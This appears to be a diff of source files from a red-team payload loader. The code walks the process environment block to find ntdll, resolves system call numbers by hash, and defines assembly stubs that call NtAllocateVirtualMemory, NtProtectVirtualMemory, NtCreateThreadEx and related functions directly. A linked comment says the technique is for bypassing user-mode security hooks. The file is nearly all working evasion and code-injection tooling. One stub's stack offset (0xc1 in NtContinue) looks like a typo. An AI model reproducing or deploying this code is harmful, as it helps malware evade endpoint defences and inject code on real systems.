55 PSW2_PEB Peb = (PSW2_PEB)READ_MEMLOC(PEB_OFFSET);
56 PSW2_PEB_LDR_DATA Ldr = Peb->Ldr;
57 PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
58 PVOID DllBase = NULL;
59
60 // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
61 // in the list, so it's safer to loop through the full list and find it.
62 PSW2_LDR_DATA_TABLE_ENTRY LdrEntry;
63 for (LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
64 {
65 DllBase = LdrEntry->DllBase;
66 PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
67 PIMAGE_NT_HEADERS NtHeaders = SW2_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
68 PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
69 DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
70 if (VirtualAddress == 0) continue;
71
72 ExportDirectory = SW2_RVA2VA(PIMAGE_EXPORT_DIRECTORY, DllBase, VirtualAddress);
73
74 // If this is NTDLL.dll, exit loop.
75 PCHAR DllName = SW2_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
76 if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
77 if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;
78 }
79
80 if (!ExportDirectory) return FALSE;
81
82 DWORD NumberOfNames = ExportDirectory->NumberOfNames;
83 PDWORD Functions = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);
84 PDWORD Names = SW2_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);
85 PWORD Ordinals = SW2_RVA2VA(PWORD, DllBase, ExportDirectory->AddressOfNameOrdinals);
86
87 // Populate SyscallList with unsorted Zw* entries.
88 DWORD i = 0;
89 PSW2_SYSCALL_ENTRY Entries = SyscallList->Entries;
90 do
91 {
92 PCHAR FunctionName = SW2_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);
93
94 // Is this a system call?
95 if (*(USHORT*)FunctionName == 0x775a)
96 {
97 Entries[i].Hash = SW2_HashSyscall(FunctionName);
98 Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];
99
100 i++;
101 if (i == SW2_MAX_ENTRIES) break;
102 }
103 } while (--NumberOfNames);
104
105 // Save total number of system calls found.
106 SyscallList->Count = i;
107
108 // Sort the list by address in ascending order.
109 for (DWORD i = 0; i < SyscallList->Count - 1; i++)
110 {
111 for (DWORD j = 0; j < SyscallList->Count - i - 1; j++)
112 {
113 if (Entries[j].Address > Entries[j + 1].Address)
114 {
115 // Swap entries.
116 SW2_SYSCALL_ENTRY TempEntry;
117
118 TempEntry.Hash = Entries[j].Hash;
119 TempEntry.Address = Entries[j].Address;
120
121 Entries[j].Hash = Entries[j + 1].Hash;
122 Entries[j].Address = Entries[j + 1].Address;
123
124 Entries[j + 1].Hash = TempEntry.Hash;
125 Entries[j + 1].Address = TempEntry.Address;
126 }
127 }
128 }
129
130 return TRUE;
131 }
132
133 EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash, PSYSCALL_LIST SyscallList)
134 {
135 // Check that the SyscallList was allocated
136 if (SyscallList == NULL) return -1;
137 // Ensure SyscallList is populated.
138 if (!SW2_PopulateSyscallList(SyscallList)) return -1;
139
140 for (DWORD i = 0; i < SyscallList->Count; i++)
141 {
142 if (FunctionHash == SyscallList->Entries[i].Hash)
143 {
144 return i;
145 }
146 }
147
148 return -1;
149 }
150
151 #if defined(_MSC_VER) && defined (_M_IX86)
152
153 __declspec(naked) NTSTATUS NtCreateSection(
154 OUT PHANDLE SectionHandle,
155 IN ACCESS_MASK DesiredAccess,
156 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
157 IN PLARGE_INTEGER MaximumSize OPTIONAL,
158 IN ULONG SectionPageProtection,
159 IN ULONG AllocationAttributes,
160 IN HANDLE FileHandle OPTIONAL,
161 IN PSYSCALL_LIST SyscallList) {
162 __asm {
163 mov eax, dword ptr[esp + 0x20] // hex((1+(NUM_PARAMS-1))*4)
164 push eax
165 push 0x32956E27
166 call SW2_GetSyscallNumber
167 add esp, 8
168 call DoSysenter
169 ret
170 }
171 }
172
173 __declspec(naked) NTSTATUS NtMapViewOfSection(
174 IN HANDLE SectionHandle,
175 IN HANDLE ProcessHandle,
176 IN OUT PVOID BaseAddress,
177 IN ULONG ZeroBits,
178 IN SIZE_T CommitSize,
179 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
180 IN OUT PSIZE_T ViewSize,
181 IN ULONG InheritDisposition,
182 IN ULONG AllocationType,
183 IN ULONG Win32Protect,
184 IN PSYSCALL_LIST SyscallList) {
185 __asm {
186 mov eax, dword ptr[esp + 0x2c] // hex((1+(NUM_PARAMS-1))*4)
187 push eax
188 push 0x035E220D
189 call SW2_GetSyscallNumber
190 add esp, 8
191 call DoSysenter
192 ret
193 }
194 }
195
196 __declspec(naked) NTSTATUS NtUnmapViewOfSection(
197 IN HANDLE ProcessHandle,
198 IN PVOID BaseAddress,
199 IN PSYSCALL_LIST SyscallList) {
200 __asm {
201 mov eax, dword ptr[esp + 0x0c] // hex((1+(NUM_PARAMS-1))*4)
202 push eax
203 push 0x9ACEB842
204 call SW2_GetSyscallNumber
205 add esp, 8
206 call DoSysenter
207 ret
208 }
209 }
210
211 __declspec(naked) NTSTATUS NtContinue(
212 IN PCONTEXT ContextRecord,
213 IN BOOLEAN TestAlert,
214 IN PSYSCALL_LIST SyscallList) {
215 __asm {
216 mov eax, dword ptr[esp + 0xc1] // hex((1+(NUM_PARAMS-1))*4)
217 push eax
218 push 0xF2989153
219 call SW2_GetSyscallNumber
220 add esp, 8
221 call DoSysenter
222 ret
223 }
224 }
225
226 __declspec(naked) NTSTATUS NtClose(
227 IN HANDLE Handle,
228 IN PSYSCALL_LIST SyscallList) {
229 __asm {
230 mov eax, dword ptr[esp + 0x08] // hex((1+(NUM_PARAMS-1))*4)
231 push eax
232 push 0x349DD6D1
233 call SW2_GetSyscallNumber
234 add esp, 8
235 call DoSysenter
236 ret
237 }
238 }
239
240 __declspec(naked) NTSTATUS NtWaitForSingleObject(
241 IN HANDLE ObjectHandle,
242 IN BOOLEAN Alertable,
243 IN PLARGE_INTEGER TimeOut OPTIONAL,
244 IN PSYSCALL_LIST SyscallList) {
245 __asm {
246 mov eax, dword ptr[esp + 0x10] // hex((1+(NUM_PARAMS-1))*4)
247 push eax
248 push 0xE3BDE123
249 call SW2_GetSyscallNumber
250 add esp, 8
251 call DoSysenter
252 ret
253 }
254 }
255
256 __declspec(naked) NTSTATUS NtProtectVirtualMemory(
257 IN HANDLE ProcessHandle,
258 IN OUT PVOID * BaseAddress,
259 IN OUT PSIZE_T RegionSize,
260 IN ULONG NewProtect,
261 OUT PULONG OldProtect,
262 IN PSYSCALL_LIST SyscallList) {
263 __asm {
264 mov eax, dword ptr[esp + 0x18] // hex((1+(NUM_PARAMS-1))*4)
265 push eax
266 push 0x0B911517
267 call SW2_GetSyscallNumber
268 add esp, 8
269 call DoSysenter
270 ret
271 }
272 }
273
274 __declspec(naked) NTSTATUS NtGetContextThread(
275 IN HANDLE ThreadHandle,
276 IN OUT PCONTEXT ThreadContext,
277 IN PSYSCALL_LIST SyscallList) {
278 __asm {
279 mov eax, dword ptr[esp + 0x0c] // hex((1+(NUM_PARAMS-1))*4)
280 push eax
281 push 0x1CB74215
282 call SW2_GetSyscallNumber
283 add esp, 8
284 call DoSysenter
285 ret
286 }
287 }
288
289 __declspec(naked) NTSTATUS NtAllocateVirtualMemory(
290 IN HANDLE ProcessHandle,
291 IN OUT PVOID * BaseAddress,
292 IN ULONG ZeroBits,
293 IN OUT PSIZE_T RegionSize,
294 IN ULONG AllocationType,
295 IN ULONG Protect,
296 IN PSYSCALL_LIST SyscallList) {
297 __asm {
298 mov eax, dword ptr[esp + 0x1c] // hex((1+(NUM_PARAMS-1))*4)
299 push eax
300 push 0x31A5474B
301 call SW2_GetSyscallNumber
302 add esp, 8
303 call DoSysenter
304 ret
305 }
306 }
307
308 __declspec(naked) NTSTATUS NtFreeVirtualMemory(
309 IN HANDLE ProcessHandle,
310 IN OUT PVOID * BaseAddress,
311 IN OUT PSIZE_T RegionSize,
312 IN ULONG FreeType,
313 IN PSYSCALL_LIST SyscallList) {
314 __asm {
315 mov eax, dword ptr[esp + 0x14] // hex((1+(NUM_PARAMS-1))*4)
316 push eax
317 push 0x87907FEF
318 call SW2_GetSyscallNumber
319 add esp, 8
320 call DoSysenter
321 ret
322 }
323 }
324
325 __declspec(naked) NTSTATUS NtCreateFile(
326 OUT PHANDLE FileHandle,
327 IN ACCESS_MASK DesiredAccess,
328 IN POBJECT_ATTRIBUTES ObjectAttributes,
329 OUT PIO_STATUS_BLOCK IoStatusBlock,
330 IN PLARGE_INTEGER AllocationSize OPTIONAL,
331 IN ULONG FileAttributes,
332 IN ULONG ShareAccess,
333 IN ULONG CreateDisposition,
334 IN ULONG CreateOptions,
335 IN PVOID EaBuffer OPTIONAL,
336 IN ULONG EaLength,
337 IN PSYSCALL_LIST SyscallList) {
338 __asm {
339 mov eax, dword ptr[esp + 0x30] // hex((1+(NUM_PARAMS-1))*4)
340 push eax
341 push 0x249DFE2A
342 call SW2_GetSyscallNumber
343 add esp, 8
344 call DoSysenter
345 ret
346 }
347 }
348
349 __declspec(naked) NTSTATUS NtQueryVirtualMemory(
350 IN HANDLE ProcessHandle,
351 IN PVOID BaseAddress,
352 IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
353 OUT PVOID MemoryInformation,
354 IN SIZE_T MemoryInformationLength,
355 OUT PSIZE_T ReturnLength OPTIONAL,
356 IN PSYSCALL_LIST SyscallList) {
357 __asm {
358 mov eax, dword ptr[esp + 0x1c] // hex((1+(NUM_PARAMS-1))*4)
359 push eax
360 push 0x55CF2B39
361 call SW2_GetSyscallNumber
362 add esp, 8
363 call DoSysenter
364 ret
365 }
366 }
367
368 __declspec(naked) NTSTATUS NtCreateThreadEx(
369 OUT PHANDLE ThreadHandle,
370 IN ACCESS_MASK DesiredAccess,
371 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
372 IN HANDLE ProcessHandle,
373 IN PVOID StartRoutine,
374 IN PVOID Argument OPTIONAL,
375 IN ULONG CreateFlags,
376 IN SIZE_T ZeroBits,
377 IN SIZE_T StackSize,
378 IN SIZE_T MaximumStackSize,
379 IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL,
380 IN PSYSCALL_LIST SyscallList) {
381 __asm {
382 mov eax, dword ptr[esp + 0x30] // hex((1+(NUM_PARAMS-1))*4)
383 push eax
384 push 0x34297693
385 call SW2_GetSyscallNumber
386 add esp, 8
387 call DoSysenter
388 ret
389 }
390 }
391
392 __declspec(naked) NTSTATUS NtFlushInstructionCache(
393 IN HANDLE ProcessHandle,
394 IN PVOID BaseAddress OPTIONAL,
395 IN ULONG Length,
396 IN PSYSCALL_LIST SyscallList) {
397 __asm {
398 mov eax, dword ptr[esp + 0x10] // hex((1+(NUM_PARAMS-1))*4)
399 push eax
400 push 0xFFACC9F7
401 call SW2_GetSyscallNumber
402 add esp, 8
403 call DoSysenter
404 ret
405 }
406 }
407
408 #elif defined(__GNUC__)
409
410 __declspec(naked) NTSTATUS NtCreateSection(
411 OUT PHANDLE SectionHandle,
412 IN ACCESS_MASK DesiredAccess,
413 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
414 IN PLARGE_INTEGER MaximumSize OPTIONAL,
415 IN ULONG SectionPageProtection,
416 IN ULONG AllocationAttributes,
417 IN HANDLE FileHandle OPTIONAL,
418 IN PSYSCALL_LIST SyscallList) {
419 #if defined(_WIN64)
420 asm(
421 "push rcx\n"
422 "push rdx\n"
423 "push r8\n"
424 "push r9\n"
425 "mov ecx, 0x32956E27\n"
426 "mov rdx, qword ptr [rsp + 0x60]\n" // (4+5+(NUM_PARAMS-4-1))*8
427 "sub rsp, 0x28\n"
428 "call SW2_GetSyscallNumber\n"
429 "add rsp, 0x28\n"
430 "pop r9\n"
431 "pop r8\n"
432 "pop rdx\n"
433 "pop rcx\n"
434 "mov r10, rcx\n"
435 "syscall\n"
436 "ret\n"
437 );
438 #else
439 asm(
440 "mov eax, dword ptr[esp + 0x20]\n" // hex((1+(NUM_PARAMS-1))*4)
441 "push eax\n"
442 "push 0x32956E27\n"
443 "call SW2_GetSyscallNumber\n"
444 "add esp, 8\n"
445 "call DoSysenter\n"
446 "ret\n"
447 );
448 #endif
449 }
450
451 __declspec(naked) NTSTATUS NtMapViewOfSection(
452 IN HANDLE SectionHandle,
453 IN HANDLE ProcessHandle,
454 IN OUT PVOID BaseAddress,
455 IN ULONG ZeroBits,
456 IN SIZE_T CommitSize,
457 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
458 IN OUT PSIZE_T ViewSize,
459 IN ULONG InheritDisposition,
460 IN ULONG AllocationType,
461 IN ULONG Win32Protect,
462 IN PSYSCALL_LIST SyscallList) {
463 #if defined(_WIN64)
464 asm(
465 "push rcx\n"
466 "push rdx\n"
467 "push r8\n"
468 "push r9\n"
469 "mov ecx, 0x035E220D\n"
470 "mov rdx, qword ptr [rsp + 0x78]\n" // (4+5+(NUM_PARAMS-4-1))*8
471 "sub rsp, 0x28\n"
472 "call SW2_GetSyscallNumber\n"
473 "add rsp, 0x28\n"
474 "pop r9\n"
475 "pop r8\n"
476 "pop rdx\n"
477 "pop rcx\n"
478 "mov r10, rcx\n"
479 "syscall\n"
480 "ret\n"
481 );
482 #else
483 asm(
484 "mov eax, dword ptr[esp + 0x2c]\n" // hex((1+(NUM_PARAMS-1))*4)
485 "push eax\n"
486 "push 0x035E220D\n"
487 "call SW2_GetSyscallNumber\n"
488 "add esp, 8\n"
489 "call DoSysenter\n"
490 "ret\n"
491 );
492 #endif
493 }
494
495 __declspec(naked) NTSTATUS NtUnmapViewOfSection(
496 IN HANDLE ProcessHandle,
497 IN PVOID BaseAddress,
498 IN PSYSCALL_LIST SyscallList) {
499 #if defined(_WIN64)
500 asm(
501 "push rcx\n"
502 "push rdx\n"
503 "push r8\n"
504 "push r9\n"
505 "mov ecx, 0x9ACEB842\n"
506 "mov rdx, r8\n"
507 "sub rsp, 0x28\n"
508 "call SW2_GetSyscallNumber\n"
509 "add rsp, 0x28\n"
510 "pop r9\n"
511 "pop r8\n"
512 "pop rdx\n"
513 "pop rcx\n"
514 "mov r10, rcx\n"
515 "syscall\n"
516 "ret\n"
517 );
518 #else
519 asm(
520 "mov eax, dword ptr[esp + 0x0c]\n" // hex((1+(NUM_PARAMS-1))*4)
521 "push eax\n"
522 "push 0x9ACEB842\n"
523 "call SW2_GetSyscallNumber\n"
524 "add esp, 8\n"
525 "call DoSysenter\n"
526 "ret\n"
527 );
528 #endif
529 }
530
531 __declspec(naked) NTSTATUS NtContinue(
532 IN PCONTEXT ContextRecord,
533 IN BOOLEAN TestAlert,
534 IN PSYSCALL_LIST SyscallList) {
535 #if defined(_WIN64)
536 asm(
537 "push rcx\n"
538 "push rdx\n"
539 "push r8\n"
540 "push r9\n"
541 "mov ecx, 0xF2989153\n"
542 "mov rdx, r8\n"
543 "sub rsp, 0x28\n"
544 "call SW2_GetSyscallNumber\n"
545 "add rsp, 0x28\n"
546 "pop r9\n"
547 "pop r8\n"
548 "pop rdx\n"
549 "pop rcx\n"
550 "mov r10, rcx\n"
551 "syscall\n"
552 "ret\n"
553 );
554 #else
555 asm(
556 "mov eax, dword ptr[esp + 0xc1]\n" // hex((1+(NUM_PARAMS-1))*4)
557 "push eax\n"
558 "push 0xF2989153\n"
559 "call SW2_GetSyscallNumber\n"
560 "add esp, 8\n"
561 "call DoSysenter\n"
562 "ret\n"
563 );
564 #endif
565 }
566
567 __declspec(naked) NTSTATUS NtClose(
568 IN HANDLE Handle,
569 IN PSYSCALL_LIST SyscallList) {
570 #if defined(_WIN64)
571 asm(
572 "push rcx\n"
573 "push rdx\n"
574 "push r8\n"
575 "push r9\n"
576 "mov ecx, 0x349DD6D1\n"
577 "mov rdx, rdx\n"
578 "sub rsp, 0x28\n"
579 "call SW2_GetSyscallNumber\n"
580 "add rsp, 0x28\n"
581 "pop r9\n"
582 "pop r8\n"
583 "pop rdx\n"
584 "pop rcx\n"
585 "mov r10, rcx\n"
586 "syscall\n"
587 "ret\n"
588 );
589 #else
590 asm(
591 "mov eax, dword ptr[esp + 0x08]\n" // hex((1+(NUM_PARAMS-1))*4)
592 "push eax\n"
593 "push 0x349DD6D1\n"
594 "call SW2_GetSyscallNumber\n"
595 "add esp, 8\n"
596 "call DoSysenter\n"
597 "ret\n"
598 );
599 #endif
600 }
601
602 __declspec(naked) NTSTATUS NtWaitForSingleObject(
603 IN HANDLE ObjectHandle,
604 IN BOOLEAN Alertable,
605 IN PLARGE_INTEGER TimeOut OPTIONAL,
606 IN PSYSCALL_LIST SyscallList) {
607 #if defined(_WIN64)
608 asm(
609 "push rcx\n"
610 "push rdx\n"
611 "push r8\n"
612 "push r9\n"
613 "mov ecx, 0xE3BDE123\n"
614 "mov rdx, r9\n"
615 "sub rsp, 0x28\n"
616 "call SW2_GetSyscallNumber\n"
617 "add rsp, 0x28\n"
618 "pop r9\n"
619 "pop r8\n"
620 "pop rdx\n"
621 "pop rcx\n"
622 "mov r10, rcx\n"
623 "syscall\n"
624 "ret\n"
625 );
626 #else
627 asm(
628 "mov eax, dword ptr[esp + 0x10]\n" // hex((1+(NUM_PARAMS-1))*4)
629 "push eax\n"
630 "push 0xE3BDE123\n"
631 "call SW2_GetSyscallNumber\n"
632 "add esp, 8\n"
633 "call DoSysenter\n"
634 "ret\n"
635 );
636 #endif
637 }
638
639 __declspec(naked) NTSTATUS NtProtectVirtualMemory(
640 IN HANDLE ProcessHandle,
641 IN OUT PVOID * BaseAddress,
642 IN OUT PSIZE_T RegionSize,
643 IN ULONG NewProtect,
644 OUT PULONG OldProtect,
645 IN PSYSCALL_LIST SyscallList) {
646 #if defined(_WIN64)
647 asm(
648 "push rcx\n"
649 "push rdx\n"
650 "push r8\n"
651 "push r9\n"
652 "mov ecx, 0x0B911517\n"
653 "mov rdx, qword ptr [rsp + 0x50]\n" // (4+5+(NUM_PARAMS-4-1))*8
654 "sub rsp, 0x28\n"
655 "call SW2_GetSyscallNumber\n"
656 "add rsp, 0x28\n"
657 "pop r9\n"
658 "pop r8\n"
659 "pop rdx\n"
660 "pop rcx\n"
661 "mov r10, rcx\n"
662 "syscall\n"
663 "ret\n"
664 );
665 #else
666 asm(
667 "mov eax, dword ptr[esp + 0x18]\n" // hex((1+(NUM_PARAMS-1))*4)
668 "push eax\n"
669 "push 0x0B911517\n"
670 "call SW2_GetSyscallNumber\n"
671 "add esp, 8\n"
672 "call DoSysenter\n"
673 "ret\n"
674 );
675 #endif
676 }
677
678 __declspec(naked) NTSTATUS NtGetContextThread(
679 IN HANDLE ThreadHandle,
680 IN OUT PCONTEXT ThreadContext,
681 IN PSYSCALL_LIST SyscallList) {
682 #if defined(_WIN64)
683 asm(
684 "push rcx\n"
685 "push rdx\n"
686 "push r8\n"
687 "push r9\n"
688 "mov ecx, 0x1CB74215\n"
689 "mov rdx, r8\n"
690 "sub rsp, 0x28\n"
691 "call SW2_GetSyscallNumber\n"
692 "add rsp, 0x28\n"
693 "pop r9\n"
694 "pop r8\n"
695 "pop rdx\n"
696 "pop rcx\n"
697 "mov r10, rcx\n"
698 "syscall\n"
699 "ret\n"
700 );
701 #else
702 asm(
703 "mov eax, dword ptr[esp + 0x0c]\n" // hex((1+(NUM_PARAMS-1))*4)
704 "push eax\n"
705 "push 0x1CB74215\n"
706 "call SW2_GetSyscallNumber\n"
707 "add esp, 8\n"
708 "call DoSysenter\n"
709 "ret\n"
710 );
711 #endif
712 }
713
714 __declspec(naked) NTSTATUS NtAllocateVirtualMemory(
715 IN HANDLE ProcessHandle,
716 IN OUT PVOID * BaseAddress,
717 IN ULONG ZeroBits,
718 IN OUT PSIZE_T RegionSize,
719 IN ULONG AllocationType,
720 IN ULONG Protect,
721 IN PSYSCALL_LIST SyscallList) {
722 #if defined(_WIN64)
723 asm(
724 "push rcx\n"
725 "push rdx\n"
726 "push r8\n"
727 "push r9\n"
728 "mov ecx, 0x31A5474B\n"
729 "mov rdx, qword ptr [rsp + 0x58]\n" // (4+5+(NUM_PARAMS-4-1))*8
730 "sub rsp, 0x28\n"
731 "call SW2_GetSyscallNumber\n"
732 "add rsp, 0x28\n"
733 "pop r9\n"
734 "pop r8\n"
735 "pop rdx\n"
736 "pop rcx\n"
737 "mov r10, rcx\n"
738 "syscall\n"
739 "ret\n"
740 );
741 #else
742 asm(
743 "mov eax, dword ptr[esp + 0x1c]\n" // hex((1+(NUM_PARAMS-1))*4)
744 "push eax\n"
745 "push 0x31A5474B\n"
746 "call SW2_GetSyscallNumber\n"
747 "add esp, 8\n"
748 "call DoSysenter\n"
749 "ret\n"
750 );
751 #endif
752 }
753
754 __declspec(naked) NTSTATUS NtFreeVirtualMemory(
755 IN HANDLE ProcessHandle,
756 IN OUT PVOID * BaseAddress,
757 IN OUT PSIZE_T RegionSize,
758 IN ULONG FreeType,
759 IN PSYSCALL_LIST SyscallList) {
760 #if defined(_WIN64)
761 asm(
762 "push rcx\n"
763 "push rdx\n"
764 "push r8\n"
765 "push r9\n"
766 "mov ecx, 0x87907FEF\n"
767 "mov rdx, qword ptr [rsp + 0x48]\n" // (4+5+(NUM_PARAMS-4-1))*8
768 "sub rsp, 0x28\n"
769 "call SW2_GetSyscallNumber\n"
770 "add rsp, 0x28\n"
771 "pop r9\n"
772 "pop r8\n"
773 "pop rdx\n"
774 "pop rcx\n"
775 "mov r10, rcx\n"
776 "syscall\n"
777 "ret\n"
778 );
779 #else
780 asm(
781 "mov eax, dword ptr[esp + 0x14]\n" // hex((1+(NUM_PARAMS-1))*4)
782 "push eax\n"
783 "push 0x87907FEF\n"
784 "call SW2_GetSyscallNumber\n"
785 "add esp, 8\n"
786 "call DoSysenter\n"
787 "ret\n"
788 );
789 #endif
790 }
791
792 __declspec(naked) NTSTATUS NtCreateFile(
793 OUT PHANDLE FileHandle,
794 IN ACCESS_MASK DesiredAccess,
795 IN POBJECT_ATTRIBUTES ObjectAttributes,
796 OUT PIO_STATUS_BLOCK IoStatusBlock,
797 IN PLARGE_INTEGER AllocationSize OPTIONAL,
798 IN ULONG FileAttributes,
799 IN ULONG ShareAccess,
800 IN ULONG CreateDisposition,
801 IN ULONG CreateOptions,
802 IN PVOID EaBuffer OPTIONAL,
803 IN ULONG EaLength,
804 IN PSYSCALL_LIST SyscallList) {
805 #if defined(_WIN64)
806 asm(
807 "push rcx\n"
808 "push rdx\n"
809 "push r8\n"
810 "push r9\n"
811 "mov ecx, 0x249DFE2A\n"
812 "mov rdx, qword ptr [rsp + 0x80]\n" // (4+5+(NUM_PARAMS-4-1))*8
813 "sub rsp, 0x28\n"
814 "call SW2_GetSyscallNumber\n"
815 "add rsp, 0x28\n"
816 "pop r9\n"
817 "pop r8\n"
818 "pop rdx\n"
819 "pop rcx\n"
820 "mov r10, rcx\n"
821 "syscall\n"
822 "ret\n"
823 );
824 #else
825 asm(
826 "mov eax, dword ptr[esp + 0x30]\n" // hex((1+(NUM_PARAMS-1))*4)
827 "push eax\n"
828 "push 0x249DFE2A\n"
829 "call SW2_GetSyscallNumber\n"
830 "add esp, 8\n"
831 "call DoSysenter\n"
832 "ret\n"
833 );
834 #endif
835 }
836
837 __declspec(naked) NTSTATUS NtQueryVirtualMemory(
838 IN HANDLE ProcessHandle,
839 IN PVOID BaseAddress,
840 IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
841 OUT PVOID MemoryInformation,
842 IN SIZE_T MemoryInformationLength,
843 OUT PSIZE_T ReturnLength OPTIONAL,
844 IN PSYSCALL_LIST SyscallList) {
845 #if defined(_WIN64)
846 asm(
847 "push rcx\n"
848 "push rdx\n"
849 "push r8\n"
850 "push r9\n"
851 "mov ecx, 0x55CF2B39\n"
852 "mov rdx, qword ptr [rsp + 0x58]\n" // (4+5+(NUM_PARAMS-4-1))*8
853 "sub rsp, 0x28\n"
854 "call SW2_GetSyscallNumber\n"
855 "add rsp, 0x28\n"
856 "pop r9\n"
857 "pop r8\n"
858 "pop rdx\n"
859 "pop rcx\n"
860 "mov r10, rcx\n"
861 "syscall\n"
862 "ret\n"
863 );
864 #else
865 asm(
866 "mov eax, dword ptr[esp + 0x1c]\n" // hex((1+(NUM_PARAMS-1))*4)
867 "push eax\n"
868 "push 0x55CF2B39\n"
869 "call SW2_GetSyscallNumber\n"
870 "add esp, 8\n"
871 "call DoSysenter\n"
872 "ret\n"
873 );
874 #endif
875 }
876
877 __declspec(naked) NTSTATUS NtCreateThreadEx(
878 OUT PHANDLE ThreadHandle,
879 IN ACCESS_MASK DesiredAccess,
880 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
881 IN HANDLE ProcessHandle,
882 IN PVOID StartRoutine,
883 IN PVOID Argument OPTIONAL,
884 IN ULONG CreateFlags,
885 IN SIZE_T ZeroBits,
886 IN SIZE_T StackSize,
887 IN SIZE_T MaximumStackSize,
888 IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL,
889 IN PSYSCALL_LIST SyscallList) {
890 #if defined(_WIN64)
891 asm(
892 "push rcx\n"
893 "push rdx\n"
894 "push r8\n"
895 "push r9\n"
896 "mov ecx, 0x34297693\n"
897 "mov rdx, qword ptr [rsp + 0x80]\n" // (4+5+(NUM_PARAMS-4-1))*8
898 "sub rsp, 0x28\n"
899 "call SW2_GetSyscallNumber\n"
900 "add rsp, 0x28\n"
901 "pop r9\n"
902 "pop r8\n"
903 "pop rdx\n"
904 "pop rcx\n"
905 "mov r10, rcx\n"
906 "syscall\n"
907 "ret\n"
908 );
909 #else
910 asm(
911 "mov eax, dword ptr[esp + 0x30]\n" // hex((1+(NUM_PARAMS-1))*4)
912 "push eax\n"
913 "push 0x34297693\n"
914 "call SW2_GetSyscallNumber\n"
915 "add esp, 8\n"
916 "call DoSysenter\n"
917 "ret\n"
918 );
919 #endif
920 }
921
922 __declspec(naked) NTSTATUS NtFlushInstructionCache(
923 IN HANDLE ProcessHandle,
924 IN PVOID BaseAddress OPTIONAL,
925 IN ULONG Length,
926 IN PSYSCALL_LIST SyscallList) {
927 #if defined(_WIN64)
928 asm(
929 "push rcx\n"
930 "push rdx\n"
931 "push r8\n"
932 "push r9\n"
933 "mov ecx, 0xFFACC9F7\n"
934 "mov rdx, r9\n"
935 "sub rsp, 0x28\n"
936 "call SW2_GetSyscallNumber\n"
937 "add rsp, 0x28\n"
938 "pop r9\n"
939 "pop r8\n"
940 "pop rdx\n"
941 "pop rcx\n"
942 "mov r10, rcx\n"
943 "syscall\n"
944 "ret\n"
945 );
946 #else
947 asm(
948 "mov eax, dword ptr[esp + 0x10]\n" // hex((1+(NUM_PARAMS-1))*4)
949 "push eax\n"
950 "push 0xFFACC9F7\n"
951 "call SW2_GetSyscallNumber\n"
952 "add esp, 8\n"
953 "call DoSysenter\n"
954 "ret\n"
955 );
956 #endif
957 }
958
959 #endif
960
961 #if defined(_M_IX86)
962 __declspec(naked) VOID DoSysenter(VOID) {
963 #if defined(_MSC_VER)
964 __asm {
965 mov edx, esp
966 int 0x2e
967 ret
968 };
969 #elif defined(__GNUC__)
970 asm(
971 "mov edx, esp\n"
972 "sysenter\n"
973 "ret\n"
974 );
975 #endif
976 }
977 #endif
+297
-0
loader/syscalls.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #pragma once
32
33 // Code below is adapted from @modexpblog. Read linked article for more details.
34 // https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams
35
36 #ifndef SW2_HEADER_H_
